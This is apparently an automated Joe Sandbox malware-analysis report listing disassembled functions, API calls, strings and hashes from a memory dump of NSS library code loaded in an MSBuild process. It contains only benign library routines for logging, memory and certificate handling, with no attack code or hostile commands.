Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID: #?jl
API String ID: 2446853827-1742918463
Opcode ID: 43d88a4825ed76b7fc6b5277db282ef34614e39f5987c2b8904da497951c5270
Instruction ID: 00c4badea49c73e309dfdcb5882c52c6a46dc19183c65225998453843c61988b
Opcode Fuzzy Hash: 43d88a4825ed76b7fc6b5277db282ef34614e39f5987c2b8904da497951c5270
Instruction Fuzzy Hash: AE5105B6D00605ABDB009F64DC458AAB7B8BF0A34CB048530ED1C97B12EB31ED55C7E9

Function 6C75A4C0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 145COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C75A4E6
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C75A4F9
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C75A553
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C75A5AC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C75A5F7
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C75A60C
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000110E1,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C75A633
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C75A671
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 6C75A69A

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C75A61D, 6C75A68B, 6C75A6B3
%s at line %d of [%.10s], xrefs: 6C75A62C
database corruption, xrefs: 6C75A627

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: _byteswap_ulong$_byteswap_ushortsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2358773949-598938438
Opcode ID: 25057cab6842bff9ec719db0bc2efb8ef7ea5038d85976daa1a4ec3e6437d8fa
Instruction ID: ff357d0e7c91781276d52a3f56325f89951bc70961a4051da94ebb24381fffb0
Opcode Fuzzy Hash: 25057cab6842bff9ec719db0bc2efb8ef7ea5038d85976daa1a4ec3e6437d8fa
Instruction Fuzzy Hash: D251A5B1908305EFDB01CF25DA84A6A7BE0FF44328F444879F88947651EB31D9A4CBA3

Function 6C6845B0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,6C681984,?), ref: 6C6845F2
SECOID_FindOIDByTag_Util.NSS3(?), ref: 6C6845FB

Part of subcall function 6C6E0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6E08B4

SECITEM_CompareItem_Util.NSS3(00000000,-00000001), ref: 6C68461E

Part of subcall function 6C6DFCB0: memcmp.VCRUNTIME140(?,8B0B74C0,04C6831E,?,00000000,?,6C684101,00000000,?,?,?,6C681666,?,?), ref: 6C6DFCF2

SECITEM_CopyItem_Util.NSS3(00000000,?,-00000019), ref: 6C684646
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C684662
PR_SetError.NSS3(FFFFE023,00000000), ref: 6C68467A
PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0), ref: 6C684691
PL_FreeArenaPool.NSS3 ref: 6C6846A3
PL_FinishArenaPool.NSS3 ref: 6C6846AB
free.MOZGLUE(?), ref: 6C6846BC
PORT_ZAlloc_Util.NSS3(?), ref: 6C6846E5
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C684717

Strings

security, xrefs: 6C6845EC

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Util$ArenaItem_Pool$Error$Alloc_CallCompareCopyDecodeFindFinishFreeInitOnceQuickTag_freememcmpmemcpy
String ID: security
API String ID: 3482804875-3315324353
Opcode ID: 6c6b9562b23233158036c6cbae66cc92043fd93bdb5db7f49b46bb768e189221
Instruction ID: 6245257754d8dba0b5822ec789b029345f4c3de3d1137adc2f9c25b2308a03b0
Opcode Fuzzy Hash: 6c6b9562b23233158036c6cbae66cc92043fd93bdb5db7f49b46bb768e189221
Instruction Fuzzy Hash: 944138B290A3106BE7008B249C44B6B77ECAF4936CF154629EC19A3B45F770E554C7EE

Function 6C6B25C0 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_GetSlotList), ref: 6C6B25DD
PR_LogPrint.NSS3( pulCount = 0x%p,?), ref: 6C6B262A

Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C790BAB
Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790BBA
Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790D7E

PR_LogPrint.NSS3( pSlotList = 0x%p,?), ref: 6C6B260F

Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(?), ref: 6C790B88
Part of subcall function 6C7909D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C790C5D
Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C790C8D
Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790C9C
Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(?), ref: 6C790CD1
Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C790CEC
Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790CFB
Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C790D16
Part of subcall function 6C7909D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C790D26
Part of subcall function 6C7909D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C790D35
Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C790D65
Part of subcall function 6C7909D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C790D70
Part of subcall function 6C7909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C790D90
Part of subcall function 6C7909D0: free.MOZGLUE(00000000), ref: 6C790D99

PR_LogPrint.NSS3( tokenPresent = 0x%x,?), ref: 6C6B25F6

Part of subcall function 6C7909D0: PR_Now.NSS3 ref: 6C790A22
Part of subcall function 6C7909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C790A35
Part of subcall function 6C7909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C790A66
Part of subcall function 6C7909D0: PR_GetCurrentThread.NSS3 ref: 6C790A70
Part of subcall function 6C7909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C790A9D
Part of subcall function 6C7909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C790AC8
Part of subcall function 6C7909D0: PR_vsmprintf.NSS3(?,?), ref: 6C790AE8
Part of subcall function 6C7909D0: EnterCriticalSection.KERNEL32(?), ref: 6C790B19
Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C790B48
Part of subcall function 6C7909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C790C76
Part of subcall function 6C7909D0: PR_LogFlush.NSS3 ref: 6C790C7E

PR_LogPrint.NSS3( *pulCount = 0x%x,?), ref: 6C6B2699
PR_LogPrint.NSS3( slotID[%d] = %x,00000000,?), ref: 6C6B26C5

Strings

*pulCount = 0x%x, xrefs: 6C6B2694
tokenPresent = 0x%x, xrefs: 6C6B25F1
nyl, xrefs: 6C6B2646, 6C6B2675
pulCount = 0x%p, xrefs: 6C6B2625
C_GetSlotList, xrefs: 6C6B25D8
slotID[%d] = %x, xrefs: 6C6B26C0
pSlotList = 0x%p, xrefs: 6C6B260A

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Print$DebugOutputStringfflush$fwrite$R_snprintf$CriticalCurrentEnterExplodeFlushR_vsmprintfR_vsnprintfSectionThreadTimefputcfreememcpy
String ID: *pulCount = 0x%x$ pSlotList = 0x%p$ pulCount = 0x%p$ slotID[%d] = %x$ tokenPresent = 0x%x$C_GetSlotList$nyl
API String ID: 2625801553-4226641309
Opcode ID: 5373ca0a32c87ceeb75089b5aed4a8d651226e95418f11205278678caab5ef57
Instruction ID: f2d63a9505cfd41e4088db7a22d47e8e161a9e595d1c557bbc7c590987e6c6dc
Opcode Fuzzy Hash: 5373ca0a32c87ceeb75089b5aed4a8d651226e95418f11205278678caab5ef57
Instruction Fuzzy Hash: AE31A132201146AFDB44DF54DE8CA4537F5BB8A35DF044475E904A7A12EF309D64CB6A

Function 6C698DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6C698E22
EnterCriticalSection.KERNEL32(?), ref: 6C698E36
memset.VCRUNTIME140(?,00000000,?), ref: 6C698E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6C698E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C698E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C698EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6C698EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C698EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6C698F00
free.MOZGLUE(?), ref: 6C698F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6C698F39
memset.VCRUNTIME140(?,00000000,?), ref: 6C698F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6C698F5B
PR_Unlock.NSS3(?), ref: 6C698F72
PR_Unlock.NSS3(?), ref: 6C698F82

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: 92363b1d58b0824c7621a30ff66d8c0eefd034613dc7027fffe1e8bda10b86b8
Instruction ID: 4cf9b32da4fab212e164fd4b01166fd47b73eadb80332d436f12989d65363f33
Opcode Fuzzy Hash: 92363b1d58b0824c7621a30ff66d8c0eefd034613dc7027fffe1e8bda10b86b8
Instruction Fuzzy Hash: 23512CB2D00216AFDB009F68DC889AEB7B9FF59358F15412AEC089B710E731ED4587D5

Function 6C6D25F0 Relevance: 21.4, APIs: 8, Strings: 6, Instructions: 403stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6DA0A0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C6AA5DF,?,00000000,6C6828AD,00000000,?,6C6AA5DF,?,object), ref: 6C6DA0C0
Part of subcall function 6C6DA0A0: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C6AA5DF,?,00000000,6C6828AD,00000000,?,6C6AA5DF,?,object), ref: 6C6DA0E8

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6D2834
memcmp.VCRUNTIME140(00000000,00000020,00000020,?,?,?,?,?,?,?,?), ref: 6C6D284B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6D2A98
memcmp.VCRUNTIME140(00000000,?,00000020,?,?,?,?,?,?,?,?,?,?), ref: 6C6D2AAF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6D2BDC
memcmp.VCRUNTIME140(00000000,?,00000010,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6D2BF3
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6D2D23
memcmp.VCRUNTIME140(00000000,?,00000010,?,?,?,?,?,?,?,?,?), ref: 6C6D2D34

Strings

, xrefs: 6C6D2A8E, 6C6D2AAB
serial, xrefs: 6C6D2AC2
model, xrefs: 6C6D2C06
manufacturer, xrefs: 6C6D285E
OQjl, xrefs: 6C6D25F7, 6C6D25FF, 6C6D2863, 6C6D2AC7, 6C6D2C0B
token, xrefs: 6C6D25FA

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: memcmpstrlen$strcmp
String ID: $OQjl$manufacturer$model$serial$token
API String ID: 2407968032-3654040745
Opcode ID: a9f1e27aa470194c033675de89c78e131d34c369c3f8b544011be011047a7b98
Instruction ID: c7a825711ae93cb97586c1983fdfaacc7ca363ea97a50e4b37ac9953b3eb8523
Opcode Fuzzy Hash: a9f1e27aa470194c033675de89c78e131d34c369c3f8b544011be011047a7b98
Instruction Fuzzy Hash: 9A02BDA1E0C3C96EF7318762C88CBE12BE09B0531CF4F15F5D9498BAA3C2AD1D999355

Function 6C6CEDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6C6CEE0B

Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C6CEEE1

Part of subcall function 6C6C1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C6C1D7E
Part of subcall function 6C6C1D50: EnterCriticalSection.KERNEL32(?), ref: 6C6C1D8E
Part of subcall function 6C6C1D50: PR_Unlock.NSS3(?), ref: 6C6C1DD3

TlsGetValue.KERNEL32 ref: 6C6CEE51
EnterCriticalSection.KERNEL32(?), ref: 6C6CEE65
PR_Unlock.NSS3(?), ref: 6C6CEEA2
free.MOZGLUE(?), ref: 6C6CEEBB
PR_SetError.NSS3(00000000,00000000), ref: 6C6CEED0
PR_Unlock.NSS3(?), ref: 6C6CEF48
free.MOZGLUE(?), ref: 6C6CEF68
PR_SetError.NSS3(00000000,00000000), ref: 6C6CEF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6C6CEFA4
free.MOZGLUE(?), ref: 6C6CEFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C6CF055
free.MOZGLUE(?), ref: 6C6CF060

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: dcbd23c14e79c3e70b6f437fe48294fca36f6f5231b50b5557597d3c0d110009
Instruction ID: a267806c175d61604f28f5d78eb4579c51e664c7a25307fb2ccc407a7369f9bc
Opcode Fuzzy Hash: dcbd23c14e79c3e70b6f437fe48294fca36f6f5231b50b5557597d3c0d110009
Instruction Fuzzy Hash: CF819FB1A00209ABDF00DFA4DC85ADE7BB5FF0D358F144024E919A3711EB35E925CBA6

Function 6C694CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C694D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C694D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C694DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C694E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C694E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C694E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C694E85
DER_Encode_Util.NSS3(?,?,6C7E05A4,00000000), ref: 6C694EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C694F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C694F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C694F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C694F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C694F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C694FC8

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: 786d3f64a01f95433209c31ab9e69ad161ceebd52afff29a7aafc734da50ff26
Instruction ID: 2d04582982685d0625641199eb556554f86d260633fade1ac5e73a7eb248ec63
Opcode Fuzzy Hash: 786d3f64a01f95433209c31ab9e69ad161ceebd52afff29a7aafc734da50ff26
Instruction Fuzzy Hash: CB81A4719083029FE701CF24D840BABB7E4AFC9358F14852DF969DB641EB71E905CB9A

Function 6C690470 Relevance: 21.2, APIs: 14, Instructions: 206timeCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6C6904B7

Part of subcall function 6C6E0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C6887ED,00000800,6C67EF74,00000000), ref: 6C6E1000
Part of subcall function 6C6E0FF0: PR_NewLock.NSS3(?,00000800,6C67EF74,00000000), ref: 6C6E1016
Part of subcall function 6C6E0FF0: PL_InitArenaPool.NSS3(00000000,security,6C6887ED,00000008,?,00000800,6C67EF74,00000000), ref: 6C6E102B

PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C690539

Part of subcall function 6C6E1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E1228
Part of subcall function 6C6E1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C6E1238
Part of subcall function 6C6E1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E124B
Part of subcall function 6C6E1200: PR_CallOnce.NSS3(6C7E2AA4,6C6E12D0,00000000,00000000,00000000,?,6C6888A4,00000000,00000000), ref: 6C6E125D
Part of subcall function 6C6E1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C6E126F
Part of subcall function 6C6E1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C6E1280
Part of subcall function 6C6E1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C6E128E
Part of subcall function 6C6E1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C6E129A
Part of subcall function 6C6E1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C6E12A1

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C69054A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C69056D
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6905CA
DER_GeneralizedTimeToTime_Util.NSS3(?,?), ref: 6C6905EA
PR_SetError.NSS3(FFFFE00C,00000000), ref: 6C6905FD
PR_SetError.NSS3(FFFFE07E,00000000), ref: 6C690621
PR_EnterMonitor.NSS3 ref: 6C69063E
PR_ExitMonitor.NSS3 ref: 6C690668
CERT_DestroyCertificate.NSS3(?), ref: 6C690697
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6906AC
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C6906CC
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6906DA

Part of subcall function 6C68E6B0: PORT_ArenaMark_Util.NSS3(00000000,?,00000000,?,?,6C6904DC,?,?), ref: 6C68E6C9
Part of subcall function 6C68E6B0: PORT_ArenaAlloc_Util.NSS3(00000000,00000088,?,?,00000000,?,?,6C6904DC,?,?), ref: 6C68E6D9
Part of subcall function 6C68E6B0: memset.VCRUNTIME140(00000000,00000000,00000088,?,?,?,?,00000000,?,?,6C6904DC,?,?), ref: 6C68E6F4
Part of subcall function 6C68E6B0: SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000,?,?,6C6904DC,?), ref: 6C68E703
Part of subcall function 6C68E6B0: CERT_FindCertIssuer.NSS3(?,?,6C6904DC,0000000B,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C68E71E

Part of subcall function 6C68F660: PR_EnterMonitor.NSS3(6C69050F,?,00000001,?,?,?), ref: 6C68F6A8
Part of subcall function 6C68F660: PR_Now.NSS3(?,?,?,00000001,?,?,?), ref: 6C68F6C1
Part of subcall function 6C68F660: PR_ExitMonitor.NSS3(?,?,?,00000001,?,?,?), ref: 6C68F7C8

Memory Dump Source

Source File: 00000001.00000002.2460181230.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true

Associated: 00000001.00000002.2460136869.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2463826458.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464374904.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464435045.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464484319.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.2464539589.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c600000_MSBuild.jbxd

Similarity

API ID: Util$ArenaArena_ErrorFree$Monitor$EnterPool$CriticalExitSectionfree$AlgorithmAlloc_CallCertCertificateClearDeleteDestroyFindGeneralizedInitIssuerLockMark_OnceTimeTime_UnlockValuecallocmemset
String ID:
API String ID: 2470852775-0
Opcode ID: b1b709608c2c28a22a3d587d930b527d9b6cab06fe80c4f736a775044691b8f2
Instruction ID: 82d3d0f6e40d8ea52b545bfaa2655a4731fa3f7f9b239528b41d16286cda88eb
Opcode Fuzzy Hash: b1b709608c2c28a22a3d587d930b527d9b6cab06fe80c4f736a775044691b8f2
Instruction Fuzzy Hash: F861E771A08342AFEB00DF28CD44B9B77E4AF88358F144529F955D7791EB30E918CB9A

Function 6C6BADC0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C6BADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6BAE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6BAE29

Part of subcall function 6C79D930: PL_strncpyz.NSS3(?,?,?), ref: 6C79D963

PR_LogPrint.NSS3(?,00000000), ref: 6C6BAE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C6BAE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6BAE8A
